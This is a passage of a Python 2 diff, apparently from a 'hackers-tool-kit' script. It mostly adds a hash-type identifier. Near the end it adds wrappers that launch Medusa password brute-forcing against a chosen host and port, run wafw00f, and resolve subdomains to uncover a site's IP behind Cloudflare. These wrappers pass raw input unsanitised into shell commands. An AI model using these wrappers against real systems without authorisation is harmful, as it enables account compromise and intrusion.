len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes 